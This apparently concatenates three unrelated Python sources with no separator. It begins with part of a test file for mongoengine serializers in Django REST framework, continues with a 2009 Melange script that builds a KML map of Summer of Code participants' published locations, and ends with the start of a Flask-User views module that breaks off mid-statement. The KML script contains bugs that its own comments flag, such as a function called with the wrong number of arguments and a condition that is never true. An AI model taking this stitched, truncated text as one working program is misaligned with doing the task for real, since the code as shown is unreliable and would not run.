            TestSerializer():
                name = CharField(required=False)
                foo = IntegerField(required=False)
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding(self):
        class TestSerializer(DocumentSerializer):
            class Meta:
                model = NestedEmbeddingDoc
                fields = '__all__'
                depth = 1
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = EmbeddedSerializer(required=False):
                    name = CharField(required=False)
                    embedded = EmbeddedSerializer(required=False):
                        name = CharField(required=False)
                        foo = IntegerField(required=False)
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding_nodepth(self):
        # Meta.depth does not limit embedded expansion (only references).
        class TestSerializer(DocumentSerializer):
            class Meta:
                model = NestedEmbeddingDoc
                fields = '__all__'
                depth = 0
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = EmbeddedSerializer(required=False):
                    name = CharField(required=False)
                    embedded = EmbeddedSerializer(required=False):
                        name = CharField(required=False)
                        foo = IntegerField(required=False)
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding_restricted(self):
        # depth_embedding caps expansion; deeper levels become HiddenField.
        class TestSerializer(DocumentSerializer):
            class Meta:
                model = NestedEmbeddingDoc
                fields = '__all__'
                depth_embedding = 1
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = EmbeddedSerializer(required=False):
                    name = CharField(required=False)
                    embedded = HiddenField(default=None, required=False)
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding_recursive(self):
        # Default embedding depth for self-referencing documents is 5.
        class TestSerializer(DocumentSerializer):
            class Meta:
                model = RecursiveEmbeddingDoc
                fields = '__all__'
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = EmbeddedSerializer(required=False):
                    name = CharField(required=False)
                    embedded = EmbeddedSerializer(required=False):
                        name = CharField(required=False)
                        embedded = EmbeddedSerializer(required=False):
                            name = CharField(required=False)
                            embedded = EmbeddedSerializer(required=False):
                                name = CharField(required=False)
                                embedded = EmbeddedSerializer(required=False):
                                    name = CharField(required=False)
                                    embedded = HiddenField(default=None, required=False)
        """)
        serializer = TestSerializer()
        assert repr(serializer) == expected

    def test_embedding_recursive_restricted(self):
        class TestSerializer(DocumentSerializer):
            class Meta:
                model = RecursiveEmbeddingDoc
                fields = '__all__'
                depth_embedding = 2
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = EmbeddedSerializer(required=False):
                    name = CharField(required=False)
                    embedded = EmbeddedSerializer(required=False):
                        name = CharField(required=False)
                        embedded = HiddenField(default=None, required=False)
        """)
        serializer = TestSerializer()
        assert repr(serializer) == expected

    def test_embedding_nested(self):
        class TestSerializer(DocumentSerializer):
            class Meta:
                model = NestedEmbeddingDoc
                fields = '__all__'
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = EmbeddedSerializer(required=False):
                    name = CharField(required=False)
                    embedded = EmbeddedSerializer(required=False):
                        name = CharField(required=False)
                        foo = IntegerField(required=False)
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding_list(self):
        class TestSerializer(DocumentSerializer):
            class Meta:
                model = ListEmbeddingDoc
                fields = '__all__'
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded_list = EmbeddedSerializer(many=True, required=False):
                    name = CharField(required=False)
                    foo = IntegerField(required=False)
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding_required(self):
        class TestSerializer(DocumentSerializer):
            class Meta:
                model = RequiredEmbeddingDoc
                fields = '__all__'
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = EmbeddedSerializer(required=True):
                    name = CharField(required=False)
                    foo = IntegerField(required=False)
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding_generic(self):
        class TestSerializer(DocumentSerializer):
            class Meta:
                model = GenericEmbeddingDoc
                fields = '__all__'
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = GenericEmbeddedDocumentField(model_field=<mongoengine.fields.GenericEmbeddedDocumentField: embedded>, required=False)
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding_custom_generic(self):
        class CustomEmbedding(DocumentField):
            pass

        class TestSerializer(DocumentSerializer):
            serializer_embedded_generic = CustomEmbedding

            class Meta:
                model = GenericEmbeddingDoc
                fields = '__all__'
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = CustomEmbedding(model_field=<mongoengine.fields.GenericEmbeddedDocumentField: embedded>, required=False)
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding_custom_nested(self):
        class CustomTestSerializer(Serializer):
            bla = drf_fields.CharField()

        class TestSerializer(DocumentSerializer):
            serializer_embedded_nested = CustomTestSerializer

            class Meta:
                model = NestedEmbeddingDoc
                fields = '__all__'
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = EmbeddedSerializer(required=False):
                    bla = CharField()
        """)
        assert repr(TestSerializer()) == expected

    def test_embedding_custom_bottom(self):
        class CustomEmbedding(Field):
            bla = drf_fields.CharField()

        class TestSerializer(DocumentSerializer):
            serializer_embedded_bottom = CustomEmbedding

            class Meta:
                model = NestedEmbeddingDoc
                fields = '__all__'
                depth_embedding = 0
        expected = dedent("""
            TestSerializer():
                id = ObjectIdField(read_only=True)
                embedded = CustomEmbedding(default=None, required=False)
        """)
        assert repr(TestSerializer()) == expected


# --- integration fixtures -------------------------------------------------

class EmbeddingSerializer(DocumentSerializer):
    class Meta:
        model = EmbeddingDoc
        fields = '__all__'


class NestedEmbeddingSerializer(DocumentSerializer):
    class Meta:
        model = NestedEmbeddingDoc
        fields = '__all__'


class TestEmbeddedIntegration(TestCase):
    """ should work on isolated embedded docs """

    def test_retrieve(self):
        """ serializing standalone doc """
        class TestSerializer(EmbeddedDocumentSerializer):
            class Meta:
                model = OtherEmbedded
                fields = '__all__'

        instance = OtherEmbedded(name="qwe", bar=123)
        serializer = TestSerializer(instance)
        assert serializer.data == OrderedDict([('name', "qwe"), ('bar', 123)])

    def test_create(self):
        """ creating standalone instance """
        class TestSerializer(EmbeddedDocumentSerializer):
            class Meta:
                model = OtherEmbedded
                fields = '__all__'

        data = {'name': "qwe", 'bar': 123}
        serializer = TestSerializer(data=data)
        assert serializer.is_valid(), serializer.errors
        instance = serializer.save()
        assert isinstance(instance, OtherEmbedded)
        assert instance.name == "qwe"
        assert instance.bar == 123

    def test_update(self):
        """ updating standalone instance with partial data """
        class TestSerializer(EmbeddedDocumentSerializer):
            class Meta:
                model = OtherEmbedded
                fields = '__all__'

        instance = OtherEmbedded(name="qwe", bar=123)
        data = {'bar': 234}
        serializer = TestSerializer(instance, data=data, partial=True)
        assert serializer.is_valid(), serializer.errors
        instance = serializer.save()
        assert isinstance(instance, OtherEmbedded)
        assert instance.name == "qwe"
        assert instance.bar == 234


class TestEmbeddingIntegration(TestCase):
    def doCleanups(self):
        EmbeddingDoc.drop_collection()

    def test_retrieve(self):
        instance = EmbeddingDoc.objects.create(
            embedded=DumbEmbedded(name="Foo")
        )
        serializer = EmbeddingSerializer(instance)
        expected = {
            'id': str(instance.id),
            'embedded': OrderedDict((('name', "Foo"), ('foo', None))),
        }
        assert serializer.data == expected

    def test_create(self):
        data = {
            'embedded': {'name': "emb"}
        }
        serializer = EmbeddingSerializer(data=data)
        assert serializer.is_valid(), serializer.errors
        instance = serializer.save()
        assert isinstance(instance.embedded, DumbEmbedded)
        assert instance.embedded.name == "emb"
        expected = {
            'id': str(instance.id),
            'embedded': OrderedDict((('name', "emb"), ('foo', None))),
        }
        assert serializer.data == expected

    def test_update(self):
        # Non-partial update: the embedded doc is replaced wholesale, so
        # the previous 'name' is expected to be dropped.
        instance = EmbeddingDoc.objects.create(
            embedded=DumbEmbedded(name="emb", foo=123)
        )
        data = {
            'embedded': {'foo': 321}
        }
        serializer = EmbeddingSerializer(instance, data=data)
        assert serializer.is_valid(), serializer.errors
        instance = serializer.save()
        assert isinstance(instance.embedded, DumbEmbedded)
        assert instance.embedded.name is None
        assert instance.embedded.foo == 321
        expected = {
            'id': str(instance.id),
            'embedded': OrderedDict((('name', None), ('foo', 321))),
        }
        assert serializer.data == expected

    @pytest.mark.skipif(True, reason="TODO")
    def test_update_partial(self):
        pass


class TestNestedEmbeddingIntegration(TestCase):
    def doCleanups(self):
        NestedEmbeddingDoc.drop_collection()

    def test_retrieve(self):
        instance = NestedEmbeddingDoc.objects.create(
            embedded=NestedEmbeddedDoc(
                name='Foo',
                embedded=DumbEmbedded(name="Bar")
            )
        )
        serializer = NestedEmbeddingSerializer(instance)
        expected = {
            'id': str(instance.id),
            'embedded': OrderedDict((
                ('name', "Foo"),
                ('embedded', OrderedDict((
                    ('name', "Bar"), ('foo', None)
                )))
            )),
        }
        assert serializer.data == expected

    def test_create(self):
        data = {
            'embedded': {
                'name': 'Foo',
                'embedded': {'name': "emb"}
            }
        }
        serializer = NestedEmbeddingSerializer(data=data)
        assert serializer.is_valid(), serializer.errors
        instance = serializer.save()
        assert isinstance(instance.embedded, NestedEmbeddedDoc)
        assert instance.embedded.name == "Foo"
        assert isinstance(instance.embedded.embedded, DumbEmbedded)
        assert instance.embedded.embedded.name == 'emb'
        assert instance.embedded.embedded.foo is None
        expected = {
            'id': str(instance.id),
            'embedded': OrderedDict((
                ('name', "Foo"),
                ('embedded', OrderedDict((('name', "emb"), ('foo', None))))
            )),
        }
        assert serializer.data == expected

    def test_update(self):
        instance = NestedEmbeddingDoc.objects.create(
            embedded=NestedEmbeddedDoc(
                name='Foo',
                embedded=DumbEmbedded(name="Bar")
            )
        )
        data = {
            'embedded': {
                'name': 'Bar',
                'embedded': {"foo": 321}
            }
        }
        serializer = NestedEmbeddingSerializer(instance, data=data)
        assert serializer.is_valid(), serializer.errors
        instance = serializer.save()
        assert isinstance(instance.embedded, NestedEmbeddedDoc)
        assert instance.embedded.name == "Bar"
        assert isinstance(instance.embedded.embedded, DumbEmbedded)
        assert instance.embedded.embedded.name is None
        assert instance.embedded.embedded.foo == 321
        expected = {
            'id': str(instance.id),
            'embedded': OrderedDict((
                ('name', 'Bar'),
                ('embedded', OrderedDict((
                    ('name', None), ('foo', 321)
                )))
            )),
        }
        assert serializer.data == expected

    @pytest.mark.skipif(True, reason="TODO")
    def test_update_partial(self):
        pass


class ListEmbeddingSerializer(DocumentSerializer):
    class Meta:
        model = ListEmbeddingDoc
        fields = '__all__'


class TestListEmbeddingIntegration(TestCase):
    def doCleanups(self):
        ListEmbeddingDoc.drop_collection()

    def test_retrieve(self):
        instance = ListEmbeddingDoc.objects.create(
            embedded_list=[DumbEmbedded(name="Foo"), DumbEmbedded(name="Bar")]
        )
        serializer = ListEmbeddingSerializer(instance)
        expected = {
            'id': str(instance.id),
            'embedded_list': [
                OrderedDict((('name', "Foo"), ('foo', None))),
                OrderedDict((('name', "Bar"), ('foo', None)))
            ],
        }
        assert serializer.data == expected

    def test_create(self):
        data = {
            'embedded_list': [
                {'name': "Foo"},
                {'foo': 123}
            ]
        }
        serializer = ListEmbeddingSerializer(data=data)
        assert serializer.is_valid(), serializer.errors
        instance = serializer.save()
        assert isinstance(instance, ListEmbeddingDoc)
        assert isinstance(instance.embedded_list[0], DumbEmbedded)
        assert instance.embedded_list[0].name == "Foo"
        assert instance.embedded_list[0].foo is None
        assert instance.embedded_list[1].name is None
        assert instance.embedded_list[1].foo == 123
        expected = {
            'id': str(instance.id),
            'embedded_list': [
                OrderedDict((('name', "Foo"), ('foo', None))),
                OrderedDict((('name', None), ('foo', 123)))
            ]
        }
        assert serializer.data == expected

    def test_update(self):
        # Non-partial update replaces the whole list (2 items -> 1 item).
        instance = ListEmbeddingDoc.objects.create(
            embedded_list=[DumbEmbedded(name="Foo"), DumbEmbedded(name="Bar")]
        )
        data = {
            'embedded_list': [
                OrderedDict((('name', "Baz"), ('foo', 321)))
            ]
        }
        serializer = ListEmbeddingSerializer(instance, data=data)
        assert serializer.is_valid(), serializer.errors
        instance = serializer.save()
        assert isinstance(instance, ListEmbeddingDoc)
        assert isinstance(instance.embedded_list[0], DumbEmbedded)
        assert len(instance.embedded_list) == 1
        assert instance.embedded_list[0].name == "Baz"
        assert instance.embedded_list[0].foo == 321
        expected = {
            'id': str(instance.id),
            'embedded_list': [OrderedDict((('name', "Baz"), ('foo', 321)))],
        }
        assert serializer.data == expected

    @pytest.mark.skipif(True, reason="TODO")
    def test_update_partial(self):
        pass


# --- validation of embedded fields ----------------------------------------

class ValidatingEmbeddedModel(EmbeddedDocument):
    text = fields.StringField(min_length=3)


class ValidatingEmbeddingModel(Document):
    embedded = fields.EmbeddedDocumentField(ValidatingEmbeddedModel)


class ValidatingSerializer(DocumentSerializer):
    class Meta:
        model = ValidatingEmbeddingModel
        fields = '__all__'
        depth = 1


class ValidatingListEmbeddingModel(Document):
    embedded_list = fields.EmbeddedDocumentListField(ValidatingEmbeddedModel)


class ValidatingListSerializer(DocumentSerializer):
    class Meta:
        model = ValidatingListEmbeddingModel
        fields = '__all__'
        depth = 1


class TestEmbeddedValidation(TestCase):
    def test_validation_failing(self):
        serializer = ValidatingSerializer(data={'embedded': {'text': 'Fo'}})
        assert not serializer.is_valid()
        assert 'embedded' in serializer.errors
        assert 'text' in serializer.errors['embedded']

    def test_validation_passing(self):
        serializer = ValidatingSerializer(data={'embedded': {'text': 'Text'}})
        assert serializer.is_valid(), serializer.errors

    def test_nested_validation_failing(self):
        serializer = ValidatingListSerializer(data={'embedded_list': [{'text': 'Fo'}]})
        assert not serializer.is_valid()
        assert 'embedded_list' in serializer.errors
        assert 'text' in serializer.errors['embedded_list'][0]

    def test_nested_validation_passing(self):
        serializer = ValidatingListSerializer(data={'embedded_list': [{'text': 'Text'}]})
        assert serializer.is_valid(), serializer.errors
#!/usr/bin/env python2.5
#
# Copyright 2009 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""The script which generates KML file for Google Summer of Code 2009
program.
"""

__authors__ = [
  '"Daniel Hans" <daniel.m.hans@gmail.com>',
]


import sys
import codecs

import interactive

from xml.dom.minidom import Document


def _getMentoredProjects(mentor):
  """Returns a list of projects which are mentored by a given mentor.
  """
  # Imported lazily: App Engine models must not load before the script
  # environment is set up.
  from soc.logic.models.student_project import logic as project_logic
  # NOTE: 'filter' shadows the builtin; kept as-is (local scope only).
  filter = {
      'mentor': mentor
      }
  return project_logic.getForFields(filter=filter)


def _getAcceptedOrgs():
  """Returns a list of organizations which got accepted.

  Both 'active' and 'new' organizations count as accepted.
  """
  from soc.logic.models.organization import logic as org_logic
  filter = {
      'status': 'active'
      }
  entities = org_logic.getForFields(filter=filter)
  filter = {
      'status': 'new'
      }
  entities += org_logic.getForFields(filter=filter)
  return entities


def _getStudentProject(entity):
  """Returns a project for a given student.

  Only the single accepted project is considered (unique=True).
  """
  from soc.logic.models.student_project import logic as project_logic
  filter = {
      'student': entity,
      'status': 'accepted',
      }
  return project_logic.getForFields(filter=filter, unique=True)


def _getAllUsers():
  """Returns a list of all valid users.
  """
  from soc.models.user import User
  gen = lambda: User.all().filter('status =', 'valid')
  return interactive.deepFetch(gen)


def _getAllOrgAdmins():
  """Returns a generator of all active org admins.
  """
  from soc.models.org_admin import OrgAdmin
  gen = lambda: OrgAdmin.all().filter('status = ', 'active')
  return interactive.deepFetch(gen)


def _getAllMentors():
  """Returns a generator of all active mentors.
  """
  from soc.models.mentor import Mentor
  gen = lambda: Mentor.all().filter('status = ', 'active')
  return interactive.deepFetch(gen)


def _getAllStudents():
  """Returns a generator of all active students.
  """
  from soc.models.student import Student
  gen = lambda: Student.all().filter('status = ', 'active')
  return interactive.deepFetch(gen)


def _getPersonStyle(doc, type):
  """Returns <Style> element for a particular person.

  The (x, y) pair selects the icon inside the palette-5.png sprite for
  the given role.
  """
  # NOTE(review): 'type' shadows the builtin, and an unknown value leaves
  # x_text/y_text unbound, raising UnboundLocalError below — callers must
  # only pass 'org_admin', 'mentor' or 'student'.
  if type == 'org_admin':
    x_text, y_text = '0', '0'
  elif type == 'mentor':
    x_text, y_text = '128', '96'
  elif type == 'student':
    x_text, y_text = '64', '160'

  style = doc.createElement('Style')

  icon_style = doc.createElement('IconStyle')
  style.appendChild(icon_style)

  icon = doc.createElement('Icon')
  icon_style.appendChild(icon)

  href = doc.createElement('href')
  icon.appendChild(href)
  text = doc.createTextNode('root://icons/palette-5.png')
  href.appendChild(text)

  x = doc.createElement('x')
  icon.appendChild(x)
  text = doc.createTextNode(x_text)
  x.appendChild(text)

  y = doc.createElement('y')
  icon.appendChild(y)
  text = doc.createTextNode(y_text)
  y.appendChild(text)

  w = doc.createElement('w')
  icon.appendChild(w)
  text = doc.createTextNode('32')
  w.appendChild(text)

  h = doc.createElement('h')
  icon.appendChild(h)
  text = doc.createTextNode('32')
  h.appendChild(text)

  return style


def _getLineStringStyle(doc):
  """Returns <Style> element for a line string placemark.

  Green ('ff00ff00' in KML aabbggrr order), width 1.
  """
  style = doc.createElement('Style')

  line_style = doc.createElement('LineStyle')
  style.appendChild(line_style)

  color = doc.createElement('color')
  line_style.appendChild(color)
  text = doc.createTextNode('ff00ff00')
  color.appendChild(text)

  width = doc.createElement('width')
  line_style.appendChild(width)
  text = doc.createTextNode('1')
  width.appendChild(text)

  return style


def _getDescriptionForStudent(doc, student, project):
  """Returns <description> element for a given student.

  NOTE(review): this function appears broken/legacy — the two _append*
  calls below pass 3 arguments to 4-parameter functions and would raise
  TypeError if executed. It looks superseded by _getStudentDescription;
  confirm before use.
  """
  description = doc.createElement('description')

  text = doc.createTextNode('Working on...')
  description.appendChild(text)
  description.appendChild(doc.createElement('br'))

  i = doc.createElement('i')
  description.appendChild(i)
  title = doc.createTextNode(project.title)
  i.appendChild(title)
  description.appendChild(doc.createElement('br'))

  mentor = doc.createTextNode(
      'mentored by ' + _getName(project.mentor))
  description.appendChild(mentor)
  description.appendChild(doc.createElement('br'))

  org = doc.createTextNode(project.scope.name)
  description.appendChild(org)
  description.appendChild(doc.createElement('br'))
  description.appendChild(doc.createElement('br'))

  # NOTE(review): arity mismatch — see docstring above.
  description = _appendHomePageAndBlogContent(doc, description, student)
  description = _appendStateAndCountryContnent(doc, description, student)

  return description


def _appendStateAndCountryContnent(doc, description, state, country):
  """Appends state and country info to the description of a placemark.

  NOTE(review): "Contnent" is a typo for "Content"; the name is kept as-is
  because it may be referenced elsewhere in the file.
  """
  if state:
    description.appendChild(doc.createTextNode(state + ', '))
  description.appendChild(doc.createTextNode(country))

  return description


def _appendHomePageAndBlogContent(doc, description, home_pages, blogs):
  """Appends home page and blog info to the description of a placemark.
  """
  if home_pages:
    text = doc.createTextNode('Home page:')
    description.appendChild(text)
    description.appendChild(doc.createElement('br'))
  for home_page in home_pages:
    description.appendChild(doc.createTextNode(home_page))
    description.appendChild(doc.createElement('br'))
  if home_pages:
    description.appendChild(doc.createElement('br'))

  if blogs:
    text = doc.createTextNode('Blog:')
    description.appendChild(text)
    description.appendChild(doc.createElement('br'))
  for blog in blogs:
    description.appendChild(doc.createTextNode(blog))
    description.appendChild(doc.createElement('br'))
  if blogs:
    description.appendChild(doc.createElement('br'))

  return description


def _getName(entity):
  """For a given entity returns a name to be displayed.
  """
  return entity.name()


def _getMentorDescription(doc, content):
  """Returns <description> element for a mentor / org admin based on content.

  Expected keys in `content` (from how they are read below): 'admin',
  'projects' (each with 'title', 'student', 'org'), 'consults',
  'home_pages', 'blogs', 'state', 'country'.
  """
  description = doc.createElement('description')

  admin = content['admin']
  if admin:
    text = doc.createTextNode('Organization admin for ' + admin)
    description.appendChild(text)
    description.appendChild(doc.createElement('br'))

  projects = content['projects']
  if projects:
    text = doc.createTextNode('Mentoring...')
    description.appendChild(text)
    description.appendChild(doc.createElement('br'))
  for project in projects:
    i = doc.createElement('i')
    description.appendChild(i)
    title = doc.createTextNode(project['title'])
    i.appendChild(title)
    description.appendChild(doc.createElement('br'))
    student = doc.createTextNode('by ' + project['student'])
    description.appendChild(student)
    description.appendChild(doc.createElement('br'))
    organization = doc.createTextNode(project['org'])
    description.appendChild(organization)
    description.appendChild(doc.createElement('br'))

  consults = content['consults']
  for consult in consults:
    text = doc.createTextNode(consult)
    description.appendChild(text)
    description.appendChild(doc.createElement('br'))
  description.appendChild(doc.createElement('br'))

  home_pages = content['home_pages']
  blogs = content['blogs']
  description = _appendHomePageAndBlogContent(doc, description,
                                              home_pages, blogs)

  state = content['state']
  country = content['country']
  description = _appendStateAndCountryContnent(doc, description,
                                               state, country)

  return description


def _getStudentDescription(doc, content):
  """Returns <description> element for a student based on content.
  """
  description = doc.createElement('description')

  text = doc.createTextNode('Working on...')
  description.appendChild(text)
  description.appendChild(doc.createElement('br'))

  project = content['project']
  i = doc.createElement('i')
  description.appendChild(i)
  title = doc.createTextNode(project.title)
  i.appendChild(title)
  description.appendChild(doc.createElement('br'))

  mentor = doc.createTextNode('mentored by ' + project.mentor.name())
  description.appendChild(mentor)
  description.appendChild(doc.createElement('br'))

  org = doc.createTextNode(project.scope.name)
  description.appendChild(org)
  description.appendChild(doc.createElement('br'))
  description.appendChild(doc.createElement('br'))

  home_pages = content['home_pages']
  blogs = content['blogs']
  description = _appendHomePageAndBlogContent(doc, description,
                                              home_pages, blogs)

  state = content['state']
  country = content['country']
  description = _appendStateAndCountryContnent(doc, description,
                                               state, country)

  return description


def _createFolderForMentorsAndOrgAdmins(doc):
  """Creates and returns a KML <Folder> element (labelled "Mentors") that
  groups the placemarks for mentors and org admins.
  """
  folder = doc.createElement("Folder")

  name = doc.createElement("name")
  folder.appendChild(name)
  nametext = doc.createTextNode("Mentors")
  name.appendChild(nametext)

  return folder


def _createLineString(doc, student, mentor):
  """Generates line string between a given student and mentor.

  `student` and `mentor` are (longitude, latitude) pairs.
  """
  line_string = doc.createElement('LineString')

  coordinates = doc.createElement('coordinates')
  line_string.appendChild(coordinates)
  text = doc.createTextNode(str(student[0]) + ',' + str(student[1]) + ' ' +
      str(mentor[0]) + ',' + str(mentor[1]))
  coordinates.appendChild(text)

  altitude_mode = doc.createElement('altitudeMode')
  line_string.appendChild(altitude_mode)
  text = doc.createTextNode('clampToGround')
  altitude_mode.appendChild(text)

  extrude = doc.createElement('extrude')
  line_string.appendChild(extrude)
  text = doc.createTextNode('1')
  extrude.appendChild(text)

  tessellate = doc.createElement('tessellate')
  line_string.appendChild(tessellate)
  text = doc.createTextNode('1')
  tessellate.appendChild(text)

  return line_string


def _createPoint(doc, longitude, latitude):
  """Generates <Point> subtree with coordinates for a given entity.
  """
  point = doc.createElement('Point')
  coordinates = doc.createElement('coordinates')
  point.appendChild(coordinates)
  text = doc.createTextNode(str(longitude) + ',' + str(latitude))
  coordinates.appendChild(text)

  return point


def _createStudentPlacemark(doc, coordinates, content):
  """Creates <Placemark> element for a student based on a given content.
  """
  placemark = doc.createElement('Placemark')

  style = _getPersonStyle(doc, 'student')
  placemark.appendChild(style)

  name = doc.createElement('name')
  placemark.appendChild(name)
  text = doc.createTextNode(content['name'])
  name.appendChild(text)

  description = _getStudentDescription(doc, content)
  placemark.appendChild(description)

  point = _createPoint(doc, coordinates[0], coordinates[1])
  placemark.appendChild(point)

  return placemark


def _createMentorPlacemark(doc, coordinates, content):
  """Creates <Placemark> element for a mentor based on a given content.
  """
  placemark = doc.createElement('Placemark')

  # Org admins get a distinct icon.
  type = 'org_admin' if content['admin'] is not None else 'mentor'
  style = _getPersonStyle(doc, type)
  placemark.appendChild(style)

  name = doc.createElement('name')
  placemark.appendChild(name)
  text = doc.createTextNode(content['name'])
  name.appendChild(text)

  description = _getMentorDescription(doc, content)
  placemark.appendChild(description)

  point = _createPoint(doc, coordinates[0], coordinates[1])
  placemark.appendChild(point)

  return placemark


def _createLineStringPlacemark(doc, student_coordinates, mentor_coordinates):
  """Creates <Placemark> element for a line string between given student
  coordinates and mentor coordinates.
  """
  placemark = doc.createElement('Placemark')

  line_string = _createLineString(doc, student_coordinates,
      mentor_coordinates)
  placemark.appendChild(line_string)

  style = _getLineStringStyle(doc)
  placemark.appendChild(style)

  return placemark


def _processMentor(doc, org_admin, mentors, folder):
  """Processes a student and adds information to a folder.
""" projects = [] placemarks = {} longitude = None latitude = None for entity in mentors: if not entity.publish_location: continue longitude, latitude = (entity.longitude, entity.latitude) if not placemarks.get((longitude, latitude)): placemarks[(longitude, latitude)] = { 'admin': None, 'projects': [], 'consults': [], 'name': entity.name(), 'country': entity.res_country, 'state': entity.res_state, 'home_pages': set(), 'blogs': set() } projects = _getMentoredProjects(entity) if not projects: placemarks[(longitude, latitude)]['consults'].append( 'Mentor for ' + entity.scope.name) else: for project in projects: placemarks[(longitude, latitude)]['projects'].append({ 'title': project.title, 'org': project.scope.name, 'student': project.student.name() }) if entity.home_page: placemarks[(longitude, latitude)]['home_pages'].add(entity.home_page) if entity.blog: placemarks[(longitude, latitude)]['blogs'].add(entity.blog) if org_admin and org_admin.publish_location: if not (longitude, latitude): longitude, latitude = (org_admin.longitude, org_admin.latitude) if not placemarks.get((longitude, latitude)): placemarks[(longitude, latitude)] = { 'admin': None, 'projects': [], 'consults': [], 'name': org_admin.name(), 'country': org_admin.res_country, 'state': org_admin.res_state, 'home_pages': set(), 'blogs': set() } placemarks[(longitude, latitude)]['admin'] = org_admin.scope.name if org_admin.home_page: placemarks[(longitude, latitude)]['home_pages'].add(org_admin.home_page) if org_admin.blog: placemarks[(longitude, latitude)]['blogs'].add(org_admin.blog) for coordinates, content in placemarks.iteritems(): placemark = _createMentorPlacemark(doc, coordinates, content) folder.appendChild(placemark) def _processStudent(doc, student, orgs_folder): """Processes a student and adds information to a folder. 
""" if not student.publish_location: return project = _getStudentProject(student) if not project: return folder = doc.createElement('Folder') name = doc.createElement('name') folder.appendChild(name) name.appendChild(doc.createTextNode(student.name())) content = { 'name': student.name(), 'project': project, 'country': student.res_country, 'state': student.res_state, 'home_pages': [student.home_page] if student.home_page else [], 'blogs': [student.blog] if student.blog else [] } coordinates = student.longitude, student.latitude placemark = _createStudentPlacemark(doc, coordinates, content) folder.appendChild(placemark) mentor = project.mentor if mentor.publish_location: mentor_coordinates = mentor.longitude, mentor.latitude line_string = _createLineStringPlacemark(doc, coordinates, mentor_coordinates) folder.appendChild(line_string) org = project.scope org_folder = orgs_folder[org.name] org_folder.appendChild(folder) def _processAllUsers(doc, mentors_folder, orgs_folder): """Processes all users and fills folders with information based on roles. 
""" from soc.logic.models.mentor import logic as mentor_logic from soc.logic.models.org_admin import logic as org_admin_logic from soc.logic.models.student import logic as student_logic it = _getAllOrgAdmins() org_admins = dict() for org_admin in it: org_admins[org_admin.link_id] = org_admin it = _getAllMentors() mentors = dict() for mentor in it: link_id = mentor.link_id if link_id not in mentors: mentors[link_id] = [] mentors[link_id].append(mentor) it = _getAllStudents() students = dict() for student in it: students[student.link_id] = student link_ids = set(mentors.keys() + org_admins.keys()) for link_id in link_ids: entity = org_admins.get(link_id) entities = mentors.get(link_id, []) if entity or entities: _processMentor(doc, entity, entities, mentors_folder) continue link_ids = students.keys() for link_id in link_ids: entity = students.get(link_id) if entity: _processStudent(doc, entity, orgs_folder) def _createFolderForStudentsAndOrgs(doc): """Creates <Folder> elements for all students and for all accepted organizations. Returns: A tuple whose first element is a folder for students and the second one is a dictionary mapping organization names with their folders. """ folder = doc.createElement('Folder') name = doc.createElement('name') folder.appendChild(name) text = doc.createTextNode('Students') name.appendChild(text) orgs = _getAcceptedOrgs() org_folders = {} for org in orgs: org_folder = doc.createElement('Folder') folder.appendChild(org_folder) name = doc.createElement('name') org_folder.appendChild(name) text = doc.createTextNode(org.name) name.appendChild(text) org_folders[org.name] = org_folder return folder, org_folders def generateCompleteKML(): """Generates complete KML file for Google Summer of Code 2009. 
""" doc = Document() kml = doc.createElement('kml') doc.appendChild(kml) document = doc.createElement('Document') kml.appendChild(document) mentor_folder = _createFolderForMentorsAndOrgAdmins(doc) document.appendChild(mentor_folder) student_folder, org_folders = _createFolderForStudentsAndOrgs(doc) document.appendChild(student_folder) _processAllUsers(doc, mentor_folder, org_folders) out = codecs.open('soc_map2009.kml', 'w', 'utf-8') out.write(doc.toprettyxml(indent=' ')) out.close() def main(args): context = { 'export': generateCompleteKML, } interactive.setup() interactive.remote(args, context) if __name__ == '__main__': if len(sys.argv) < 2: print "Usage: %s app_id [host]" % (sys.argv[0],) sys.exit(1) main(sys.argv[1:])
""" This file contains view functions for Flask-User forms. :copyright: (c) 2013 by Ling Thio :author: Ling Thio (ling.thio@gmail.com) :license: Simplified BSD License, see LICENSE.txt for more details.""" from datetime import datetime from flask import current_app, flash, redirect, render_template, request, url_for from flask_login import current_user, login_user, logout_user try: # Handle Python 2.x and Python 3.x from urllib.parse import quote # Python 3.x except ImportError: from urllib import quote # Python 2.x from .decorators import confirm_email_required, login_required from . import emails from . import signals from .translations import gettext as _ def confirm_email(token): """ Verify email confirmation token and activate the user account.""" # Verify token user_manager = current_app.user_manager db_adapter = user_manager.db_adapter is_valid, has_expired, object_id = user_manager.verify_token( token, user_manager.confirm_email_expiration) if has_expired: flash(_('Your confirmation token has expired.'), 'error') return redirect(url_for('user.login')) if not is_valid: flash(_('Invalid confirmation token.'), 'error') return redirect(url_for('user.login')) # Confirm email by setting User.active=True and User.confirmed_at=utcnow() if db_adapter.UserEmailClass: user_email = user_manager.get_user_email_by_id(object_id) if user_email: user_email.confirmed_at = datetime.utcnow() user = user_email.user else: user = 